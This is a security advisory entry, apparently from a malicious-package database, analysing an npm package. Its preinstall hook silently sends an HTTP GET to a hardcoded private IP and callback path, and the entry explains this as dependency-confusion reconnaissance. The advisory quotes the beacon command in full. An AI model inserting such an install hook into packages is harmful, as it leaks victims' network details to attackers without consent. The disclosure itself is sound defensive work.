MAL-2026-5720

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3) package.json declares a preinstall lifecycle hook that runs `node -e "require('http').get('http://10.107.121.85:8001/callback_839201')"` on `npm install`. This unconditionally issues an HTTP GET to a hardcoded RFC1918 address (10.107.121.85:8001) over plaintext, with a path (`/callback_839201`) that encodes a unique per-package probe identifier. The behavior fires automatically as part of the install lifecycle with no opt-in. The combination of (a) a bare-IP, non-publisher destination, (b) a unique callback identifier matched to the package name, and (c) plaintext HTTP on an internal/private network is the canonical dependency-confusion reconnaissance beacon: it confirms reachability from the installer's network into an attacker-controlled listener and leaks the installer's source IP, install timing, and the fact that this specific probe package resolved inside the target environment. Even though the captured request body is empty, the install itself is the signal — successful callbacks identify victim networks for follow-on attacks.